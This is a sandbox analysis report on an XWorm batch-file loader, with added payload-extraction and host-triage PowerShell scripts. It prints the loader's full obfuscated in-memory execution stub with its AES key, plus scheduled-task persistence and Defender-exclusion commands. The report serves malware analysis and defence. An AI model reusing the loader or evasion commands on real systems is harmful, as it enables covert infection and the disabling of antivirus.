Analysis
max time kernel: 128s
max time network: 146s
platform: windows10-1703_x64
resource: win10-20240404-en
resource tags: arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
submitted: 22-05-2024 13:04
Static task: static1
Behavioral task: behavioral1
Sample: MonkerV1GuiTest.bat
Resource: win10-20240404-en
General
Target: MonkerV1GuiTest.bat
Size: 294KB
MD5: 2b235c5e792b8c3dcbc4ccd0ccff02de
SHA1: 6dd8fac6545df5f64bda4e746f3921d9a072bb59
SHA256: ebd66fd9265f312babcebc214c9e23433e0c0e88504c5859f034bdacffd54ddb
SHA512: cf61c50763cf8656bfb23250553052c1191179d30b50884f1cf8dcae64be48eae8dc43b9ccdb453e38e71bd4f5cfe94f8d44e86ba80552232eacdf23bac99e2f
SSDEEP: 6144:6pA2upleIJqLKXd33GCpiMcOa+7seZEN3CbryZPhvAF8:6pAdpwoqa93GO2Oa+tON3CbGvf
Malware Config
Extracted: xworm
  135.125.21.87:7000
  Install_directory: %AppData%
  install_file: USB.exe
Note that the install_file in the extracted configuration (USB.exe) differs from the file name actually used at runtime in this run (Win32 under %AppData%, see Signatures and Downloads below); treat both names as indicators.
Signatures

Detect Xworm Payload (1 IoC)
  yara_rule family_xworm matched in behavioral1/memory/1580-115-0x000001F4FD760000-0x000001F4FD778000-memory.dmp

Blocklisted process makes network request (1 IoC)
  flow 2: pid 1580 powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
  Run PowerShell and hide display window.
  pids 1360, 4644, 1580, 3952, 1912, 4616, 1824 (all powershell.exe)

Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32.lnk (powershell.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Win32.lnk (powershell.exe)

Executes dropped EXE (1 IoC)
  pid 2356 Win32

Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\Win32 = "C:\\Users\\Admin\\AppData\\Roaming\\Win32" (powershell.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings (powershell.exe)

Runs net.exe

Suspicious behavior: EnumeratesProcesses (25 IoCs)
  powershell.exe pids 1360 (x3), 4644 (x3), 1580 (x4), 3952 (x3), 1912 (x3), 4616 (x3), 1824 (x3); Win32 pid 2356 (x3)

Suspicious use of AdjustPrivilegeToken (64 IoCs shown; the listing ends mid-cycle)
  pid 1360 powershell.exe: SeDebugPrivilege
  pid 4644 powershell.exe: SeDebugPrivilege, then repeated passes (three are visible) enabling SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege and the unnamed privileges 33, 34, 35, 36

Suspicious use of SetWindowsHookEx (1 IoC)
  pid 1580 powershell.exe

Suspicious use of WriteProcessMemory (28 IoCs; every parent/child pair is listed twice in the report)
  660 cmd.exe -> 1568 net.exe
  1568 net.exe -> 1964 net1.exe
  660 cmd.exe -> 1360 powershell.exe
  1360 powershell.exe -> 4644 powershell.exe
  1360 powershell.exe -> 5040 WScript.exe
  5040 WScript.exe -> 3736 cmd.exe
  3736 cmd.exe -> 608 net.exe
  608 net.exe -> 1816 net1.exe
  3736 cmd.exe -> 1580 powershell.exe
  1580 powershell.exe -> 3952 powershell.exe
  1580 powershell.exe -> 1912 powershell.exe
  1580 powershell.exe -> 4616 powershell.exe
  1580 powershell.exe -> 1824 powershell.exe
  1580 powershell.exe -> 4756 schtasks.exe

Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (indented by depth in the process tree; pids are correlated from the WriteProcessMemory IoCs above; command lines are verbatim)

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat"   [pid 660]
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe: net file   [pid 1568]
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe: C:\Windows\system32\net1 file   [pid 1964]
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   [pid 1360]
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YEfma8Fsqpo8Nxcmsh2LlMT5phz3RC1od46Bs4haKuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bS7q7G7pSQFFezaTbyErVA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HUiNZ=New-Object System.IO.MemoryStream(,$param_var); $wYjxe=New-Object System.IO.MemoryStream; $eamGN=New-Object System.IO.Compression.GZipStream($HUiNZ, [IO.Compression.CompressionMode]::Decompress); $eamGN.CopyTo($wYjxe); $eamGN.Dispose(); $HUiNZ.Dispose(); $wYjxe.Dispose(); $wYjxe.ToArray();}function execute_function($param_var,$param2_var){ $ddqEY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KPhFH=$ddqEY.EntryPoint; $KPhFH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat';$zudcm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\MonkerV1GuiTest.bat').Split([Environment]::NewLine);foreach ($XVfwy in $zudcm) { if ($XVfwy.StartsWith(':: ')) { $bxXKt=$XVfwy.Substring(3); break; }}$payloads_var=[string[]]$bxXKt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   [pid 4644]
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_699_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_699.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\System32\WScript.exe   [pid 5040]
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_699.vbs"
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_699.bat" "   [pid 3736]
        - Suspicious use of WriteProcessMemory
        C:\Windows\system32\net.exe: net file   [pid 608]
          - Suspicious use of WriteProcessMemory
          C:\Windows\system32\net1.exe: C:\Windows\system32\net1 file   [pid 1816]
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe   [pid 1580]
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('YEfma8Fsqpo8Nxcmsh2LlMT5phz3RC1od46Bs4haKuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bS7q7G7pSQFFezaTbyErVA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HUiNZ=New-Object System.IO.MemoryStream(,$param_var); $wYjxe=New-Object System.IO.MemoryStream; $eamGN=New-Object System.IO.Compression.GZipStream($HUiNZ, [IO.Compression.CompressionMode]::Decompress); $eamGN.CopyTo($wYjxe); $eamGN.Dispose(); $HUiNZ.Dispose(); $wYjxe.Dispose(); $wYjxe.ToArray();}function execute_function($param_var,$param2_var){ $ddqEY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KPhFH=$ddqEY.EntryPoint; $KPhFH.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_699.bat';$zudcm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_699.bat').Split([Environment]::NewLine);foreach ($XVfwy in $zudcm) { if ($XVfwy.StartsWith(':: ')) { $bxXKt=$XVfwy.Substring(3); break; }}$payloads_var=[string[]]$bxXKt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Drops startup file
          - Adds Run key to start application
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          Four powershell.exe children [pids 3952, 1912, 4616, 1824 per the WriteProcessMemory IoCs; the report does not say which pid ran which command]:
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Win32'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Win32'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          C:\Windows\System32\schtasks.exe   [pid 4756]
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Win32" /tr "C:\Users\Admin\AppData\Roaming\Win32"
            - Creates scheduled task(s)

C:\Users\Admin\AppData\Roaming\Win32   [pid 2356; a separate tree root, consistent with launch by the "Win32" scheduled task rather than by the cmd.exe chain]
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
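Both PowerShell loader command lines above are the same stub with its method names hidden as reversed strings: 'gnirtS46esaBmorF'[-1..-16] is FromBase64String, 'txeTllAdaeR'[-1..-11] is ReadAllText and 'daoL'[-1..-4] is Load. The stub reads its own .bat file, takes the first line that starts with ':: ' (a batch comment, so cmd.exe never executes it), splits that line on '\' into two base64 blobs and, for each blob, base64-decodes, AES-CBC-decrypts with the hardcoded 32-byte key and 16-byte IV (PKCS7 padding), gunzips, and runs the result in-process through Assembly.Load().EntryPoint.Invoke(). The script below is an added example written for this page, not code from the report or from the malware: it repeats the same decode chain with the key and IV taken from the command line, but writes the two decrypted assemblies to disk instead of executing them so they can be hashed and analysed offline. The output directory and the payloadN.bin names are assumptions. Because startup_str_699.bat is byte-identical to the submitted sample (same hashes in Downloads), the same key and IV apply to both files. Run it only in an isolated analysis VM.

```powershell
# Added example (not from the sandbox report or the malware): static extractor for the
# two-stage payload carried in the ':: ' comment line of MonkerV1GuiTest.bat /
# startup_str_699.bat. Key, IV, delimiter and the decrypt-then-gunzip order are taken
# from the loader command line in the report; $OutDir and the payloadN.bin names are
# assumptions. The assemblies are written to disk and never loaded.
param(
    [Parameter(Mandatory)][string]$BatPath,
    [string]$OutDir = (Join-Path $PWD 'extracted')
)

$KeyB64 = 'YEfma8Fsqpo8Nxcmsh2LlMT5phz3RC1od46Bs4haKuk='   # 32 bytes after decoding: AES-256
$IvB64  = 'bS7q7G7pSQFFezaTbyErVA=='                       # 16-byte IV

function ConvertFrom-LoaderBlob {
    param([byte[]]$Cipher)
    # AES-CBC/PKCS7 decrypt, exactly as decrypt_function in the loader does.
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec = $aes.CreateDecryptor()
        try { $plain = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }

    # Gunzip, as decompress_function does. This is where the loader would go on to
    # Assembly.Load() the bytes; we stop at the raw file instead.
    $in  = New-Object System.IO.MemoryStream(,$plain)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out) } finally { $gz.Dispose(); $in.Dispose() }
    $bytes = $out.ToArray()
    $out.Dispose()
    return ,$bytes
}

# Locate the carrier line the same way the loader does: first line beginning with ':: '.
$carrier = Get-Content -LiteralPath $BatPath |
    Where-Object { $_.StartsWith(':: ') } |
    Select-Object -First 1
if (-not $carrier) { throw "No ':: ' payload line found in $BatPath" }

$null = New-Item -ItemType Directory -Path $OutDir -Force
$i = 0
foreach ($b64 in $carrier.Substring(3).Split('\')) {
    $i++
    $bytes = ConvertFrom-LoaderBlob ([Convert]::FromBase64String($b64))
    $dest  = Join-Path $OutDir ("payload{0}.bin" -f $i)
    [System.IO.File]::WriteAllBytes($dest, $bytes)

    # Sanity check and pivot data: a .NET assembly starts with 'MZ'; the SHA256 lets you
    # compare against the report's Downloads list and external sandboxes.
    $isPe = ($bytes.Length -ge 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
    $sha  = (Get-FileHash -LiteralPath $dest -Algorithm SHA256).Hash
    '{0}: {1} bytes, MZ header: {2}, SHA256: {3}' -f $dest, $bytes.Length, $isPe, $sha
}
```

Usage, with the script saved under an assumed name: `.\Extract-BatLoader.ps1 -BatPath .\MonkerV1GuiTest.bat`. The loader invokes payload 1 with no arguments and payload 2 with an empty string[] argument, so expect two managed executables; if the second blob fails to decrypt, the ':: ' line was modified or wrapped during transfer, because the loader itself would then fail the same way.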
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log   (standard CLR usage log written by any .NET process, not a payload)
  Filesize: 3KB
  MD5: 8592ba100a78835a6b94d5949e13dfc1
  SHA1: 63e901200ab9a57c7dd4c078d7f75dcd3b357020
  SHA256: fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
  SHA512: 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive   (PowerShell startup cache; four versions were written during the run)
  Filesize: 1KB
  MD5: d4ac7391fd23c0ad0c6ed9c7ea98f287
  SHA1: 683431e2fe4aafac6e66b0beb72581713e6076f4
  SHA256: 31babb713b3b56c572a38cfa0c2cd7bbdf7da7be759c507c683a5e579f3bdce2
  SHA512: b10dabd1c3b09e6b7fb4aba542907f659c77ecd86f574b6edfe60a3d7d2a214ba9a0763fc5c14daf152b0e39b10e6d981bfdafceac5fa0e338cd21450febb424

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 1d4a155a1b0b1cbfcfb8fe6a7613cc24
  SHA1: 03457d9128ada0e15f979429f52b89dba27d12b0
  SHA256: 9b6e2eeddd54e7ef329df2a85a1b256c61a02d3bf0593210e5211f26d720518d
  SHA512: 60c25309198f287d213d6a2c5a953335eb98d29a795851bf17464a5980842488f7122f07fe308b34fe59b802a33cea936c44a402ae04d98236a8517fa23df16b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 8e9fc5e3884e45406faacc5e195eaa72
  SHA1: 53b522ee43f9539378c247cd333a422e46e3680a
  SHA256: 0c9156566c600c32b4103c10725fffc2311bad19f20fd4797bfb537855fa059a
  SHA512: cfe05edabb1f654f3dc86c73a182a986d0ece1b32401d5e7fdb8965cdd2765ec82251047d3d53d123c15171b8d158edba12243603d5d3efa375f909722fecde0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 9877c90918d6a2a5838c96ed9ae4b1e6
  SHA1: 0f42e3c9f458dcc7a4b36314f9626b79ee1b3372
  SHA256: fa49f3172eb4a081619a06ca5fa0117e89b8678ef1f8acee1a08f1a803110443
  SHA512: 28d3119dc6d621363ad848a0e7e8f8c0552d48b05d037cde42f13a2bcbfb545f60362adb65c3445844372f5e40affb6a058045b941c6fb2bc72116eca6226d8b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ojirqle0.g3m.ps1   (PowerShell's own script-policy probe file; its content is the single character "1", which these hashes confirm)
  Filesize: 1B
  MD5: c4ca4238a0b923820dcc509a6f75849b
  SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
  SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  SHA512: 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Roaming\Win32   (dropped executable; run as pid 2356 and registered in the Run key and the "Win32" scheduled task)
  Filesize: 435KB
  MD5: f7722b62b4014e0c50adfa9d60cafa1c
  SHA1: f31c17e0453f27be85730e316840f11522ddec3e
  SHA256: ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
  SHA512: 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

C:\Users\Admin\AppData\Roaming\startup_str_699.bat   (byte-identical to the submitted sample: same size and hashes)
  Filesize: 294KB
  MD5: 2b235c5e792b8c3dcbc4ccd0ccff02de
  SHA1: 6dd8fac6545df5f64bda4e746f3921d9a072bb59
  SHA256: ebd66fd9265f312babcebc214c9e23433e0c0e88504c5859f034bdacffd54ddb
  SHA512: cf61c50763cf8656bfb23250553052c1191179d30b50884f1cf8dcae64be48eae8dc43b9ccdb453e38e71bd4f5cfe94f8d44e86ba80552232eacdf23bac99e2f

C:\Users\Admin\AppData\Roaming\startup_str_699.vbs   (launcher registered by the at-logon task 'RuntimeBroker_startup_699_str')
  Filesize: 115B
  MD5: f308d5d131313424fee9aedafb2e1a66
  SHA1: 1a61c5f5051f5ca027bf2e0431b963fe4442fbe7
  SHA256: 1c59e31ca06a1649b5c36a3d230278f45efc921a229b72dc0f47c9c485963ac9
  SHA512: 132f35947428e4347386b0da111f2ceff1e71b75799b3a9ca00d963cf662eac75c84f8fa6a720cb0fe8cc1c8bb37842843d42fb0b07c0a3f564806a4cb6efa3c
Memory dumps
memory/1360-12-0x0000011DD7940000-0x0000011DD79B6000-memory.dmp: 472KB
memory/1360-29-0x0000011DBF7E0000-0x0000011DBF81A000-memory.dmp: 232KB
memory/1360-28-0x0000011DBF7D0000-0x0000011DBF7D8000-memory.dmp: 32KB
memory/1360-23-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/1360-3-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/1360-7-0x0000011DBF760000-0x0000011DBF782000-memory.dmp: 136KB
memory/1360-6-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/1360-5-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/1360-89-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/1580-115-0x000001F4FD760000-0x000001F4FD778000-memory.dmp: 96KB (the family_xworm YARA match from Signatures)
memory/2356-337-0x0000026A78BB0000-0x0000026A78BEC000-memory.dmp: 240KB
memory/4644-75-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/4644-42-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/4644-43-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
memory/4644-41-0x00007FFE96C10000-0x00007FFE96DEB000-memory.dmp: 1.9MB
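The persistence and defense-evasion footprint this report documents is small and specific: a "Win32" scheduled task re-run every minute with /RL HIGHEST, an at-logon task 'RuntimeBroker_startup_699_str' that runs startup_str_699.vbs, an HKCU Run value named Win32, a Win32.lnk in the Startup folder, the dropped files in %AppData%, four Defender exclusions added with Add-MpPreference (two for powershell.exe, two for the dropped Win32), and the extracted XWorm endpoint 135.125.21.87:7000. The script below is an added example for triaging a suspect host against exactly those indicators; it is not part of the sandbox report. Indicator values come from the report; the output format, the assumption that Microsoft Defender is the active AV (otherwise Get-MpPreference shows nothing useful), and the assumption that it runs in the infected user's session (the Run value lives under that user's SID hive) are mine.

```powershell
# Added example (not part of the sandbox report): host triage for the XWorm persistence,
# Defender-exclusion and C2 indicators documented in the report. Task names, paths,
# registry value, exclusions and the C2 endpoint come from the report; the output
# format and the HKCU (current user) assumption are illustrative choices.
$findings = [System.Collections.Generic.List[string]]::new()

# 1. Scheduled tasks: the every-minute 'Win32' task and the at-logon VBS launcher task.
foreach ($t in Get-ScheduledTask -ErrorAction SilentlyContinue) {
    $exe = ($t.Actions | ForEach-Object { $_.Execute }) -join ' '
    if ($t.TaskName -eq 'Win32' -or
        $t.TaskName -like 'RuntimeBroker_startup_*_str' -or
        $exe -match '\\AppData\\Roaming\\(Win32|startup_str_\d+\.vbs)$') {
        $findings.Add("ScheduledTask: $($t.TaskPath)$($t.TaskName) -> $exe")
    }
}

# 2. HKCU Run value 'Win32' pointing into %AppData% (run as the affected user; for
#    another user inspect HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Run).
$run = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -ErrorAction SilentlyContinue
if ($run -and $run.PSObject.Properties['Win32']) {
    $findings.Add("RunKey: Win32 = $($run.Win32)")
}

# 3. Startup-folder shortcut and the files dropped into %AppData%.
$paths = @(
    (Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup\Win32.lnk'),
    (Join-Path $env:APPDATA 'Win32')
) + (Get-ChildItem -Path $env:APPDATA -Filter 'startup_str_*.*' -ErrorAction SilentlyContinue).FullName
foreach ($p in $paths) {
    if ($p -and (Test-Path -LiteralPath $p)) {
        $h = (Get-FileHash -LiteralPath $p -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        $findings.Add("File: $p SHA256=$h")
    }
}

# 4. Defender exclusions. An exclusion for powershell.exe itself, or for a bare
#    executable under %AppData%, is a strong tell on its own.
$mp = Get-MpPreference -ErrorAction SilentlyContinue
if ($mp) {
    foreach ($e in @($mp.ExclusionPath) + @($mp.ExclusionProcess)) {
        if ($e -and ($e -match 'powershell\.exe$' -or $e -match '\\AppData\\Roaming\\Win32$' -or $e -eq 'Win32')) {
            $findings.Add("DefenderExclusion: $e")
        }
    }
}

# 5. Live session to the extracted XWorm endpoint (only catches a connection that is
#    open right now; use proxy/firewall logs for history).
Get-NetTCPConnection -RemoteAddress 135.125.21.87 -RemotePort 7000 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $findings.Add("C2: PID $($_.OwningProcess) $($_.State) -> $($_.RemoteAddress):$($_.RemotePort)")
    }

if ($findings.Count) { $findings } else { 'No XWorm artifacts from this report found.' }
```

Two caveats when acting on the output: the "Win32" task re-launches %AppData%\Win32 every minute, so unregister the task (and the Run value and Startup shortcut) before killing pid-level activity, or the process simply comes back; and removing the Defender exclusions with Remove-MpPreference restores scanning of powershell.exe and the drop path, which the malware disabled precisely so the dropped Win32 and the in-memory loader would not be caught.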